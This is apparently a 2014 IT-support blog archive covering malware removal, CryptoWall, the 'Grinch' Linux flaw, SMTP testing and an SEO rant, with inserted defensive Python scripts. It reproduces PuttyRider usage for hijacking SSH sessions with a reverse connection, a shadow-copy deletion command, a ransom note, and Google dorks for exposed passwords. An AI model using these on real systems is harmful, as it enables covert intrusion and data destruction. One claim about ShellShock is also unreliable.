Wednesday, December 31, 2014

Powershell Has Stopped Working & Trojans

Ref: https://forums.malwarebytes.org/index.php?/topic/159960-powershell-has-stopped-working-trojans/

Please run a Threat Scan with Malwarebytes

Start Malwarebytes 2.0..........
Click on Settings > Detection and Protection > Non-Malware Protection > PUP (Potentially Unwanted Program) detections > Make sure it's set to Treat detections as malware
Same for PUM (Potentially Unwanted Modifications)
Quarantine all that's found
Post the log (save the log as a .txt file, not .xml)


Then......

Please download and run RogueKiller 32 bit to your desktop.

RogueKiller <--- use this one for 64 bit systems

Which system am I using?

Quit all running programs.

For Windows XP, double-click to start.
For Vista or Windows 7-8, do a right-click on the program, select Run as Administrator to start, & when prompted Allow to run.


Wait for the Prescan to finish

Click Scan to scan the system.


Don't run any other options, they're not all bad!!!!!!!

RogueKiller logs will also be located here:
%programdata%/RogueKiller/Logs <------- W7
C:\Documents and Settings\All Users\Application Data\RogueKiller\Logs <------- XP
________________________________________________________________________________

Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait


The tool will create a log (Fixlog.txt) in the folder; please post it in your reply.

Then...........



Please download and run ComboFix.

The most important things to remember when running it are to disable all your anti-malware programs and to run ComboFix from your desktop.

Please visit this webpage for download links, and instructions for running ComboFix

http://www.bleepingc...to-use-combofix

http://www.bleepingc...combofix/dl/12/ 



Please make sure you click download buttons that look similar to this, not "sponsored ad links":

Ensure you have disabled all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

Information on disabling your malware programs can be found Here.

Make sure you run ComboFix from your desktop.

Give it at least 30-45 minutes to finish if needed.

Please include the C:\ComboFix.txt in your next reply for further review.


---------- NOTE ----------
If you get the message Illegal operation attempted on registry key that has been marked for deletion after you run ComboFix....please reboot the computer, this should resolve the problem. You may have to do this several times if needed.

________________________________________________________________________________
Let's check your computer's security before you go, and we have a little cleanup to do also:

Download Security Check by screen317 from HERE or HERE.

·         Save it to your Desktop.
·         Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
·         If you get Unsupported operating system. Aborting now, just reboot and try again.
·         A Notepad document should open automatically called checkup.txt.


_______________________________________________________________________________
A little clean up to do....

Please Uninstall ComboFix: (-------> if you used it <-------)

Press the Windows logo key + R to bring up the "run box"

Copy and paste next command in the field:

ComboFix /uninstall

Make sure there's a space between Combofix and /

Then hit enter. (it may look like CF is re-installing but it's not)
This will uninstall Combofix, delete its related folders and files, hide file extensions, hide the system/hidden files, clear the System Restore cache and create a new Restore point.

(If that doesn't work.....you can simply rename ComboFix.exe to Uninstall.exe and double click it to complete the uninstall or download and run the uninstaller)

---------------------------------




Download Delfix from here and save it to your desktop. (you may already have this)

·         Ensure Remove disinfection tools is checked.
·         Click the Run button.
·         Reboot
Any other programs or logs that are still remaining, you can manually delete. (right click.....Delete)
IE: RogueKiller.exe, RKreport.txt, RK_Quarantine folder, C:\FRST folder, FRST-OlderVersion folder, MBAR folder, etc....AdwCleaner > just run the program and click uninstall.

Note:
If you used FRST and can't delete the quarantine folder:
Download the fixlist.txt to the same folder as FRST.exe.
Run FRST.exe and click Fix only once and wait
That will delete the quarantine folder created by FRST.
The rest you can manually delete.




CMI Limited - Remove this Junk

Well last day of the year and out with a bang, saw a system with a ton of rogue applications installed, one being:

Tuesday, December 30, 2014

Fix Winsock

Winsock Fix for Windows Computers

After removing spyware or malware, if you have problems connecting to the Internet, you may need to initialize your TCP/IP network settings. To restore your connection, follow the directions below for the type of Windows computer you use.

Windows 7 computers

Click Start in the lower-left corner of the screen.
Click in the Start Search box and type the following command:

cmd

When cmd.exe appears in the Programs box, right-click it and select Run as administrator as shown in the following graphic:

Click Continue if the User Account Control dialog box prompts you whether to run this program.

In the window that appears, type the following command:

netsh winsock reset

The window should look similar to the following:

Press ENTER.
Restart your computer.

Wednesday, December 17, 2014

The Grinch

http://www.techworm.net/2014/12/linux-grinch-vulnerability.html#prettyPhoto

All Linux Platforms are vulnerable to the ‘Grinch’ Root Access vulnerability

Security researchers at Alert Logic have unearthed a vulnerability in Linux platforms that could potentially affect every system even remotely using Linux, including Android smartphones and tablets. This vulnerability, dubbed “Grinch”, could potentially allow a user to gain root access to a system, thereby bypassing all security mechanisms and leaving the target machine utterly defenseless. This flaw can be used across Linux-powered computers, servers and even Android devices. Alert Logic states,

According to a 2013 report from W3Tech, approximately 65% of all web servers on the Internet utilize a Unix/Linux based operating system. We uncovered a bug that impacts all Linux platforms, including mobile devices, and we’re calling it “grinch.” Fortunately, there are ways to detect the exploit of this bug in your environment until a patch is released.

Exploitation of the logging system

This isn’t the first major vulnerability to be uncovered in Linux. The same researchers had uncovered vulnerabilities in JournalD back in August 2014, which allowed attackers to hijack terminal sessions to remotely execute commands. Further digging led them to Grinch. The vulnerability was found in a Linux authorization system which could give an unauthorized user root access to the system by leveraging “wheel,” a special user group that controls access to the su command and allows one user to operate as if they were another. Writing on the Alert Logic blog, Chief Security Evangelist Stephen Coty stated,

“If we were to compromise the user through a client-side vulnerability or any privilege escalation on the box itself, we would no longer need to worry about cached Sudo authorization timestamp tokens or trying to trick users into providing their credentials with bashrc, environment modifications, or other means,” the researchers explained. “Instead, we can abuse the user’s group privileges to give us access, thus granting direct authentication bypass even if the wheel user cannot get root like in Ubuntu ecosystems.”

A potential hacker could exploit the Grinch flaw either by modifying the registered user accounts in the wheel group or by manipulating the Policy Kit (Polkit), a graphical user interface for managing privileged operations for ordinary users.

“Polkit can be used by privileged processes to decide if it should execute privileged operations on behalf of the requesting user. For directly executed tools, Polkit provides a setuid-root helper program called ‘pkexec.’ The hooks to ask the user for authorizations are well integrated into text environments and native in all major graphical environments,” notes Alert Logic in a blog.

Whichever method the attacker uses, the goal is to gain root access to the system. With root access, the attacker has full administrative control and can install, modify programs or access files in any directory. The attacker is also able to remotely control the system implying they can create a replicating worm which can be spread to other systems instantaneously.

Threat perception

With approximately 65% of web servers running on Linux/Unix, the threat of this vulnerability cannot be emphasized enough. Major companies that run their services on Linux-based systems will be affected, including the cloud servers of Amazon and Microsoft, not to mention the half a billion Android users around the world who are at risk. “We find that possession of user logs and knowledge of your own environment are the best security content to help you navigate away from a bug like grinch,” the team advised. “Know how your Linux administrator is installing packages and managing updates.”

On the bright side, the researchers also denied any news of this vulnerability ever being used so far. So no major damage has been done. It is advised to restrict user permissions on your Linux systems and also monitor user activity until a proper patch is released.

In terms of severity, Grinch could be to Linux what ShellShock is to Windows. Until a patch is released, all devices running Linux are vulnerable to Grinch. The Linux team has yet to confirm Alert Logic’s finding or issue a patch for this vulnerability, but Coty believed that Linux was working on this issue.
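The advice above (restrict user permissions, monitor user activity) can be turned into a small audit. This is an added example, not code from the article or from Alert Logic: it lists unexpected members of the wheel group and flags pkexec executions as root by accounts outside an approved list. The group file, the log lines, the approved list and the assumed pkexec syslog layout are all constructed for illustration.

```python
import re

# Constructed /etc/group content (format: name:password:gid:member,member,...).
CONSTRUCTED_GROUP = """root:x:0:
wheel:x:10:alice,deploy
users:x:100:alice,bob
"""

# Constructed auth-log lines. The "Executing command [USER=...] ... [COMMAND=...]"
# layout is the assumed pkexec syslog format; adjust the regex to your distribution.
CONSTRUCTED_LOG = [
    "Dec 17 09:12:01 web01 pkexec[2211]: alice: Executing command [USER=root] "
    "[TTY=/dev/pts/0] [CWD=/home/alice] [COMMAND=/usr/bin/yum update]",
    "Dec 17 09:40:13 web01 pkexec[2390]: deploy: Executing command [USER=root] "
    "[TTY=unknown] [CWD=/tmp] [COMMAND=/bin/sh]",
    "Dec 17 09:41:02 web01 sshd[2400]: Accepted publickey for bob from 192.0.2.10 port 50514 ssh2",
]

# Hypothetical list of accounts that are supposed to hold admin rights.
APPROVED_ADMINS = {"alice"}

PKEXEC_RE = re.compile(
    r"pkexec(?:\[\d+\])?: (?P<user>[^:\s]+): Executing command "
    r"\[USER=(?P<target>[^\]]+)\].*\[COMMAND=(?P<command>[^\]]+)\]"
)


def group_members(group_text, group_name="wheel"):
    """Return the supplementary members of one group from /etc/group-format text.

    Accounts whose primary GID is the group (set in /etc/passwd) are not listed
    here, so a complete audit must also check /etc/passwd.
    """
    for line in group_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 4 and fields[0] == group_name:
            return {member for member in fields[3].split(",") if member}
    return set()


def audit(group_text, log_lines, approved):
    """Report wheel members and pkexec-to-root events not covered by `approved`."""
    unexpected = sorted(group_members(group_text) - set(approved))
    events = []
    for line in log_lines:
        match = PKEXEC_RE.search(line)
        if match and match["target"] == "root" and match["user"] not in approved:
            events.append((match["user"], match["command"]))
    return {
        "unexpected_wheel_members": unexpected,
        "unapproved_pkexec_to_root": events,
    }


if __name__ == "__main__":
    report = audit(CONSTRUCTED_GROUP, CONSTRUCTED_LOG, APPROVED_ADMINS)
    for key, value in report.items():
        print(key, "->", value)
```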

How Public Is Your Private Information

Thursday, December 11, 2014

PuttyRider


PuttyRider is a tool that performs DLL injection into Putty and allows an attacker to inject Linux commands.
REF: https://github.com/seastorm/PuttyRider

PuttyRider
Hijack Putty sessions in order to sniff conversation and inject Linux commands.

Download
PuttyRider-bin.zip

Documentation
Defcamp 2014 presentation - pdf
Defcamp 2014 presentation - video

Examples:
List existing Putty processes and their status (injected / not injected)

  • PuttyRider.exe -l


Inject DLL into the first found putty.exe and initiate a reverse connection from DLL to my IP:Port, then exit PuttyRider.exe.

  • PuttyRider.exe -p 0 -r 192.168.0.55:8080

Run in background and wait for new Putty processes. Inject in any new putty.exe and write all conversations in local files.

  • PuttyRider.exe -w -f

Eject PuttyRider.dll from all Putty processes where it is already injected. (Don't forget to kill PuttyRider.exe if running in -w mode, otherwise it will reinject again.)

  • PuttyRider.exe -x

Usage:
Operation modes:
    -l      List the running Putty processes and their connections

    -w      Inject in all existing Putty sessions and wait for new sessions
            to inject in those also

    -p PID  Inject only in existing Putty session identified by PID.
            If PID==0, inject in the first Putty found

    -x      Cleanup. Remove the DLL from all running Putty instances

    -d      Debug mode. Only works with -p mode

    -c CMD  Automatically execute a Linux command after successful injection
            PuttyRider will remove trailing spaces and '&' character from CMD
            PuttyRider will add: " 1>/dev/null 2>/dev/null &" to CMD

    -h      Print this help

Output modes:
    -f          Write all Putty conversation to a file in the local directory.
                The filename will have the PID of current putty.exe appended

    -r IP:PORT  Initiate a reverse connection to the specified machine and
                start an interactive session.

Interactive commands (after you receive a reverse connection):
    !status     See if the Putty window is connected to user input

    !discon     Disconnect the main Putty window so it won't display anything
                    This is useful to send commands without the user to notice

    !recon      Reconnect the Putty window to its normal operation mode

    CMD       Linux shell commands

    !exit        Terminate this connection

    !help       Display help for client connection

Compiling:
Use Visual Studio Command Prompt:

  • nmake main dll


Acknowledgements
Thanks to Brett Moore of Insomnia Security for his proof of concept PuttyHijack

Tuesday, December 9, 2014

Turla Epic Snake


Trojan.Turla

Risk Level 1: Very Low
Discovered: January 13, 2014
Updated: August 8, 2014 10:55:40 AM
Type: Trojan

Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP

Trojan.Turla is a Trojan horse that may open a back door and steal information on the compromised computer.

Threat Assessment
Wild
Wild Level: Low
Number of Infections: 0 - 49
Number of Sites: 0 - 2
Geographical Distribution: Low
Threat Containment: Easy
Removal: Easy
Damage
Damage Level: Medium
Payload: Opens a back door.
Releases Confidential Info: Steals information and sends it back to a remote server.
Distribution
Distribution Level: Low

Friday, November 21, 2014

Welcome to the google hacking database


http://www.exploit-db.com/google-dorks/

We call them 'googledorks': Inept or foolish people as revealed by Google. Whatever you call these fools, you've found the center of the Google Hacking Universe!

Latest Google Hacking Entries

Date Title Category
2014-11-19 intext:"Please Authenticate" intitle:Pea... Pages containing login portals
2014-11-18 ext:txt inurl:gov intext:"Content-Type: text/... Files containing juicy info
2014-11-17 ext:msg OR ext:eml site:gov OR site:edu Files containing juicy info
2014-11-03 inurl:CHANGELOG.txt intext:drupal intext:"SA-... Vulnerable Servers
2014-11-03 inurl:robots.txt intext:CHANGELOG.txt intext:disal... Vulnerable Servers
2014-10-21 filetype:log intext:org.apache.hadoop.hdfs Files containing juicy info
2014-10-15 inurl:cgi-bin/mailgraph.cgi Various Online Devices
2014-10-14 inurl:logon.html "CSCOE" Pages containing login portals
2014-10-09 (intext:mail AND intext:samAccountName) AND (filet... Files containing juicy info
2014-10-09 intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AN... Files containing juicy info

Google Hacking Database Categories


Footholds (31)
Examples of queries that can help a hacker gain a foothold into a web server

Files containing usernames (17)
These files contain usernames, but no passwords... Still, google finding usernames on a web site..

Sensitive Directories (74)
Google's collection of web sites sharing sensitive directories. The files contained in here will vary from sensitive to uber-secret!

Web Server Detection (72)
These links demonstrate Google's awesome ability to profile web servers..

Vulnerable Files (61)
HUNDREDS of vulnerable files that Google can find on websites...

Vulnerable Servers (80)
These searches reveal servers with specific vulnerabilities. These are found in a different way than the searches found in the "Vulnerable Files" section.

Error Messages (77)
Really retarded error messages that say WAY too much!

Files containing juicy info (312)
No usernames or passwords, but interesting stuff none the less.

Files containing passwords (175)
PASSWORDS, for the LOVE OF GOD!!! Google found PASSWORDS!

Sensitive Online Shopping Info (10)
Examples of queries that can reveal online shopping info like customer data, suppliers, orders, creditcard numbers, credit card info, etc

Network or vulnerability data (63)
These pages contain such things as firewall logs, honeypot logs, network information, IDS logs... all sorts of fun stuff!

Pages containing login portals (289)
These are login pages for various services. Consider them the front door of a website's more sensitive functions.

Various Online Devices (244)
This category contains things like printers, video cameras, and all sorts of cool things found on the web with Google.

Advisories and Vulnerabilities (1971)
These searches locate vulnerable servers. These searches are often generated from various security advisory posts, and in many cases are product or version-specific.

Thursday, November 20, 2014

How to test SMTP operations using Telnet

1. Telnet into the Exchange server hosting the IMS service using TCP port 25.
Command is telnet <servername> 25

2. Turn on local echo on your telnet client so that you can see what you are typing.
On the Win 9x and NT 3.5/4.0 Telnet client this is done by selecting "preferences" from the "terminal" pull-down menu and checking the local echo radio button. For the Windows 2000 telnet client, issue the command "set local_echo" from the telnet command prompt.

3. Issue the following SMTP command sequence:

helo <your domain name>
response should be as follows
250 OK

mail from: <your e-mail address>
response should be as follows
250 OK - mail from

rcpt to: <recipient address>
response should be as follows
250 OK - Recipient

data
response should be as follows
354 Send data.  End with CRLF.CRLF

To:
From:
Subject:
.
response should be as follows
250 OK

quit
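The same dialogue can be scripted so each reply code is checked automatically. This is an added example, not part of the original walkthrough: it sends the sequence above over a raw socket and stops at the first unexpected reply. The addresses, the message and the small local stub server (used so the script runs without a real mail server) are constructed; the 220 banner and 221 reply to QUIT are standard SMTP codes that the steps above do not list.

```python
import socket
import threading

# (command, reply code expected by the walkthrough above); addresses are constructed.
STEPS = [
    ("HELO client.example", 250),
    ("MAIL FROM:<sender@example.com>", 250),
    ("RCPT TO:<recipient@example.com>", 250),
    ("DATA", 354),
]
# Constructed message; no line starts with ".", so no dot-stuffing is needed.
MESSAGE = ("To: recipient@example.com\r\nFrom: sender@example.com\r\n"
           "Subject: SMTP test\r\n\r\nTest body\r\n")


def read_reply(reader):
    """Read one SMTP reply, following '250-...' continuation lines; return (code, text)."""
    lines = []
    while True:
        raw = reader.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode("ascii", "replace").rstrip("\r\n")
        lines.append(line)
        if len(line) < 4 or line[3] != "-":
            return int(line[:3]), "\n".join(lines)


def smtp_probe(host, port, timeout=5.0):
    """Run banner/HELO/MAIL/RCPT/DATA/QUIT; return a list of (step, code, ok)."""
    results = []
    with socket.create_connection((host, port), timeout=timeout) as sock, \
            sock.makefile("rb") as reader:
        code, _ = read_reply(reader)
        results.append(("<banner>", code, code == 220))
        for command, expected in STEPS:
            sock.sendall(command.encode("ascii") + b"\r\n")
            code, _ = read_reply(reader)
            results.append((command, code, code == expected))
            if code != expected:
                break  # do not send the message after a refusal
        else:
            sock.sendall(MESSAGE.encode("ascii") + b".\r\n")
            code, _ = read_reply(reader)
            results.append(("<message>", code, code == 250))
        sock.sendall(b"QUIT\r\n")
        code, _ = read_reply(reader)
        results.append(("QUIT", code, code == 221))
    return results


def start_stub_server(reject_rcpt=False):
    """Constructed one-connection stand-in for a mail server; returns its port."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]

    def serve():
        conn, _ = listener.accept()
        with conn, conn.makefile("rb") as reader:
            conn.sendall(b"220 stub ESMTP\r\n")
            in_data = False
            for raw in reader:
                line = raw.decode("ascii", "replace").rstrip("\r\n")
                if in_data:
                    if line == ".":
                        in_data = False
                        conn.sendall(b"250 OK\r\n")
                    continue
                verb = line[:4].upper()
                if verb == "DATA":
                    in_data = True
                    conn.sendall(b"354 Send data.  End with CRLF.CRLF\r\n")
                elif verb == "QUIT":
                    conn.sendall(b"221 closing\r\n")
                    break
                elif verb == "RCPT" and reject_rcpt:
                    conn.sendall(b"550 mailbox unavailable\r\n")
                else:
                    conn.sendall(b"250 OK\r\n")
        listener.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    for reject in (False, True):
        print("stub rejects RCPT:", reject)
        for step, code, ok in smtp_probe("127.0.0.1", start_stub_server(reject)):
            print("  %-34s %d %s" % (step, code, "ok" if ok else "UNEXPECTED"))
```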

Monday, November 17, 2014

Thursday, November 6, 2014

CryptoWall Virus

So I got the pleasure of meeting this wonderful virus today while at work. I would say this is one that beat me; I was only able to reformat to remove it. I can say I tried everything though, every application from www.Bleepingcomputer.com and most AV scans I could find.

So what is CryptoWall?

CryptoWall is a file-encrypting ransomware program that was released around the end of April 2014 that targets all versions of Windows including Windows XP, Windows Vista, Windows 7, and Windows 8. The media is commonly confusing CryptoWall with the CryptoLocker infection, when it is much more similar to the CryptoDefense ransomware. The most apparent similarity being that CryptoWall's Decryption Service is almost identical to the one for CryptoDefense. In October 2014, the malware developers released a new version of CryptoWall called CryptoWall 2.0.

When you are first infected with CryptoWall it will scan your computer for data files and "encrypt" them using RSA encryption so they are no longer able to be opened. Once the infection has encrypted the files on your computer drives it will open a Notepad window that contains instructions on how to access the CryptoWall Decryption Service where you can pay a ransom to purchase a decryption program. The ransom cost starts at $500 USD and after 7 days goes up to $1,000. This ransom must be paid in Bitcoins and sent to a Bitcoin address that changes per infected user.

CryptoWall Ransom Note

CryptoWall is distributed via emails with ZIP attachments that contain executables that are disguised as PDF files. These PDF files pretend to be invoices, purchase orders, bills, complaints, or other business communications. When you double-click on the fake PDF, it will instead infect your computer with the CryptoWall infection and install malware files either in the %AppData% or %Temp% folders. Once infected the installer will start to scan your computer's drives for data files that it will encrypt. When the infection is scanning your computer it will scan all drive letters on your computer including removable drives, network shares, or even DropBox mappings. In summary, if there is a drive letter on your computer it will be scanned for data files by CryptoWall.

When CryptoWall detects a supported data file it will encrypt it and then add the full path to the file as a value under the HKEY_CURRENT_USER\Software\\CRYPTLIST Registry key. It will also create the DECRYPT_INSTRUCTION.TXT, DECRYPT_INSTRUCTION.URL or INSTALL_TOR.URL if infected with CryptoWall 2.0, and DECRYPT_INSTRUCTION.HTML files in each folder that files were encrypted and in the Windows desktop. The DECRYPT_INSTRUCTION.TXT and DECRYPT_INSTRUCTION.HTML file contain information about what happened to your data and the DECRYPT_INSTRUCTION.URL is a browser shortcut to your assigned decryption page on the infection's decryption service, which is discussed later in this guide.

When the infection has finished scanning your computer it will also delete all of the Shadow Volume Copies that are on the affected computer. It does this because you can potentially use shadow volume copies to restore your encrypted files. The command that is run to clear the Shadow Volumes is:

"C:\Windows\SYsWOW64\cmd.exe" /C "C:\Windows\Sysnative\vssadmin.exe" Delete Shadows /All /Quiet

Now that your computer's data has been fully encrypted, it will display the DECRYPT_INSTRUCTION.TXT and DECRYPT_INSTRUCTION.HTML files that were created on your Desktop. These files contain information about what has happened to your data and instructions on how to pay the ransom. In most cases, once CryptoWall launches this document it will remove the infection files from your computer as they are no longer necessary.
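The two artifacts described above, the shadow-copy deletion command and the ransom-note files left in each affected folder, are easy to hunt for during triage. This is an added example, not part of the original guide: it flags vssadmin shadow-copy deletions in a list of process command lines and walks a directory tree for the note filenames. Apart from the command quoted above, the command lines and the directory tree are constructed.

```python
import os
import re
import tempfile

# Ransom-note filenames named in the text above, compared case-insensitively.
RANSOM_NOTES = {
    "decrypt_instruction.txt",
    "decrypt_instruction.html",
    "decrypt_instruction.url",
    "install_tor.url",  # dropped by CryptoWall 2.0 according to the text
}

# Any "vssadmin delete shadows" invocation, quoted or not, in any letter case.
VSS_DELETE = re.compile(r'vssadmin(?:\.exe)?"?\s+delete\s+shadows', re.IGNORECASE)

# First entry is the command quoted above; the other two are constructed benign lines.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\SYsWOW64\cmd.exe" /C "C:\Windows\Sysnative\vssadmin.exe" Delete Shadows /All /Quiet',
    r'C:\Windows\System32\vssadmin.exe list shadows',
    r'C:\Windows\System32\notepad.exe C:\Users\alice\Desktop\DECRYPT_INSTRUCTION.TXT',
]


def find_shadow_copy_deletion(command_lines):
    """Return the command lines that delete Volume Shadow Copies."""
    return [cmd for cmd in command_lines if VSS_DELETE.search(cmd)]


def find_ransom_notes(root):
    """Map each folder under root (relative path) to the ransom notes found in it."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        notes = sorted(name for name in files if name.lower() in RANSOM_NOTES)
        if notes:
            hits[os.path.relpath(folder, root)] = notes
    return hits


def has_cryptowall2_marker(hits):
    """True if INSTALL_TOR.URL, which the text ties to CryptoWall 2.0, was found."""
    return any(name.lower() == "install_tor.url"
               for notes in hits.values() for name in notes)


def build_constructed_tree(root):
    """Create a small constructed profile directory to scan (test data only)."""
    layout = {
        "Desktop": ["DECRYPT_INSTRUCTION.TXT", "DECRYPT_INSTRUCTION.HTML",
                    "INSTALL_TOR.URL"],
        "Documents": ["invoice.docx", "Decrypt_Instruction.txt"],
        "Music": ["song.mp3"],
    }
    for folder, names in layout.items():
        os.makedirs(os.path.join(root, folder))
        for name in names:
            with open(os.path.join(root, folder, name), "w") as handle:
                handle.write("constructed sample\n")


if __name__ == "__main__":
    for cmd in find_shadow_copy_deletion(SAMPLE_COMMAND_LINES):
        print("shadow copy deletion:", cmd)
    with tempfile.TemporaryDirectory() as root:
        build_constructed_tree(root)
        hits = find_ransom_notes(root)
        for folder, notes in sorted(hits.items()):
            print("ransom notes in", folder, "->", ", ".join(notes))
        print("CryptoWall 2.0 marker present:", has_cryptowall2_marker(hits))
```

The folders that contain notes are the ones where files were encrypted, so the result doubles as a first list of what needs restoring from backup.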


Information about CryptoWall 2.0

In October 2014 the malware developers released CryptoWall 2.0, which resolved some problems in the original version. These changes include developer run Web-to-TOR gateways, unique bitcoin addresses for each victim, and secure deletion of original unencrypted files. These changes are described below:

Unique bitcoin payment addresses - The original CryptoWall utilized the same bitcoin payment address for many of its victims. This allowed people to steal the payment transactions from other victim's payments and use them towards their own ransom payment. By utilizing unique payment addresses for each victim it is no longer possible to steal other people's ransom payments.

Developer run Web-to-TOR gateways - In the past, the CryptoWall developers were utilizing other organizations' Web-to-TOR gateways so that victims could access their payment servers that are located on TOR. When these organizations discovered that CryptoWall was utilizing them, they blacklisted the CryptoWall payment servers so that they could not be reached. To resolve this, the CryptoWall developers appear to have created their own gateways to TOR. These gateways are currently operating under the following domains: tor4pay.com, pay2tor.com, tor2pay.com, and pay4tor.com.

Secure deletion of original data files - When the CryptoWall originally encrypted a file it would simply delete the original version. This made it sometimes possible to use data recovery tools to restore the original unencrypted files. CryptoWall 2.0 now utilizes a secure deletion method that makes it no longer possible to recover your files via data recovery tools.


Sample of the txt file:

What happened to your files ?
All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 2.0.
More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)

What does this mean ?
This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,
it is the same thing as losing them forever, but with our help, you can restore them.

How did this happen ?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.
All your files were encrypted with the public key, which has been transferred to your computer via the Internet.
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

What do I do ?
Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.
If you really value your data, then we suggest you do not waste valuable time searching for other solutions because they do not exist.
For more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:
1.https://paytordmbdekmizq.torsona.com/1hoxegs
2.https://paytordmbdekmizq.poltornik.com/1hoxegs
3.https://paytordmbdekmizq.dogotor.com/1hoxegs
4.https://paytordmbdekmizq.torforlove.com/1hoxegs

If for some reasons the addresses are not available, follow these steps:
1.Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en
2.After a successful installation, run the browser and wait for initialization.
3.Type in the address bar: paytordmbdekmizq.onion/1hoxegs
4.Follow the instructions on the site.


IMPORTANT INFORMATION:
Your personal page: https://paytordmbdekmizq.torsona.com/1hoxegs
Your personal page (using TOR): paytordmbdekmizq.onion/1hoxegs
Your personal identification number (if you open the site (or TOR 's) directly): 1hoxegs

Wednesday, October 29, 2014

Remove Fake Antivirus






One of my favorite tools; it usually works well, as well as one could hope. You run this, then scan your PC with AV and boom, Virus Gone!

Monday, October 27, 2014

working guide remove fff5ee.com

I got the fun time of playing with this for 9 hours today, what a big pain in the neck. Really was not a happy day. Also, when you look up how to remove it you get a page telling you to use SPYHUNTER. Let me say this: SPYHUNTER is total junk, you cannot remove anything without paying, and even then you will still not be able to remove the infections. After all that, as if it wasn't bad already, removing it requires you to use REVO Uninstaller because neither the uninstaller provided nor Windows will remove it. JUNK!


shellshock attacks mail server


Thursday, October 23, 2014

Rant: SEO's Biggest waste of money, time and resources a company could spend

I am going to add an article I found below, but I personally wanted to add my distaste for these companies. If you are going to enlist the services of an SEO you might just go ahead and wipe your ass with that cash. There is nothing that an SEO can do that no semi-tech smart person can do, and if you can search on Google you can definitely find out how to.

SEO is a complete waste of time
http://performinsider.com/2013/05/seo-is-a-complete-waste-of-time
Written by Pace Lattin
May 9, 2013 # 10:16 am # Marketing Insights, Specials # 42 Comments

There is so much out there about Search Engine Optimization (SEO), including complete publications that just focus on how to optimize, strategize and theorize about SEO. Entire companies make millions on convincing people that their entire plan should be about SEO so much that they need to hire “experts” to optimize their pages to such a degree that they need to spend more money than they could ever make in return. From reading the publications and expert blogs about SEO, you’d think that if you are not thinking about SEO all the time, you are going to completely fail at anything you do online.

Here’s the truth that no one wants to tell you: SEO is a complete waste of time.

Many people are going to read what I wrote and proclaim immediately that I am nothing but a total jackass and they are the real expert in SEO and know exactly what is going on.

On a weekly basis I have some “expert” with a blog sending me an email, telling me what I am doing wrong about SEO, and how my publication is completely fucked up from an SEO standpoint, that I am not getting any traffic whatsoever from search engines and they are happy to tell me how I should be running my business.

Here’s a few facts:

1) PerformInsider.com gets almost 1-2k people a day from search engines, mainly google. I have spent almost no time thinking about SEO. We are not even two years old.
2) We get traffic from keywords about SEO, including SEO Tip type articles, and we are not a SEO centric publication
3) Performance Marketing Insider makes more money than almost any publication in the industry based on our traffic and content. We are so successful that there are several websites that are completely dedicated to making fun of this publication.

Here’s probably what you also don’t know about me:
1) I have owned three publications about online advertising in the last 10 years, two of them existing before the word “blog” was even used, and have always been on the top of many search engines without knowing about SEO.
2) I have owned an advertising network that did $100M in revenue in one year. We were in the top 20 comscore networks for several years. We received a great deal of business from search.
3) I have never taken a single SEO class, read a single book about SEO or even gone to a SEO conference. I just have always made good content, done great promotions and focused on business. Yes, I read SEO articles sometimes.

Still, you are probably going to say, “But you need to still be concerned about SEO somewhat, right?” Yes, of course.

I’m not the biggest fan of Jeremy Schoemaker (and I hear he’s not exactly hanging posters of me on his wall) but he knows what he is talking about:

Shoemoney, Jeremy Schoemaker, SEO Sucks

Do basic things to ensure your site is optimized the best, consider the layout, and probably get some good plugins that have great reviews. Still, the focus should be on making great content that drives visitors and makes you money. If you are focusing on SEO from the start instead of creating a real site with real quality content, then you are going to have a sustainable business or site.

The other thing you need to consider is that SEO rules keep on changing. What will show up in search seems to change every day, and those who are making sites specifically for SEO are finding their business models often thrown out the door. However, every business I have made that is content based has survived and made a lot of money no matter what, because what I am doing is focused on content, not on a quick buck.

Even if the rules weren’t changing, what the experts say will work seems to be completely contradictory.

Yes, there are various design things you need to consider, how you link pages – but there are tons of plugins that will do that for you. Even the experts find themselves often being screwed when it comes to SEO because they are..umm.. over-optimizing for SEO. They are so concerned about SEO and how to optimize that they create a site that is only made for SEO and google bitch-slaps them really hard in return.

If you want to know what you really, really need to know about SEO, we actually have an article written by one of the experts. Uh-huh, he has his own publication about search engine marketing and optimization, but without having to hire an expert, read an entire book or attend a webinar, you are going to learn pretty much all you need to know from this one article called 5 SEO Tips You Should Know to Survive in 2013. Really.

Now, go make money, build content and ignore what most the experts are telling you, especially if they want you to buy something, rent something, attend something. Buh-bye.

Take care, and if you disagree, feel free to comment and tell me why.

And by the way, Penn Jillette is one of my neighbors and has the craziest-ass house I’ve ever seen.

Pace Lattin is one of the top experts in interactive advertising, affiliate marketing. Pace Lattin is known for his dedication to ethics in marketing, and focus on compliance and fraud in the industry, and has written numerous articles for publications from MediaPost, ClickZ, ADOTAS and his own blogs.